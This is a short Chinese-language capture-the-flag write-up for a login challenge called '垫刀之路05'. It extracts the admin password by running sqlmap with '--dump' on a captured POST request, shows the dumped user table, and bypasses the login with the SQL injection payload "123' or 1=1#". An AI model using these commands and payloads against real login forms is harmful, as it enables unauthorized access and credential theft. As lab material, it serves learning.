LOADING

垫刀之路05_登陆网站

网络安全

垫刀之路05: 登陆网站

要求输入用户名和密码 已知用户名admin123 登陆成功,就会显示 flag

方法一:sqlmap

这道题没有验证码,可以使用sqlmap进行暴力破解。 题目使用post请求,用户名和密码都在请求参数中。 用burpsuite抓包,报文保存为txt文件

python sqlmap -r request.txt --dump

sqlmap会使用时间盲注进行暴力破解,最后会给出用户名和密码。 耐心等待

Database: ezlogin
Table: user
[1 entry]
+----+----------------+----------+
| id | password       | username |
+----+----------------+----------+
| 1  | teMp_p3s5w0Ord | admin123 |
+----+----------------+----------+

输入密码,成功登录

手动盲注

测试后发现是错误信息只有用户名或密码错误! 输入payload:

123' or 1=1#

登录成功,显示flag。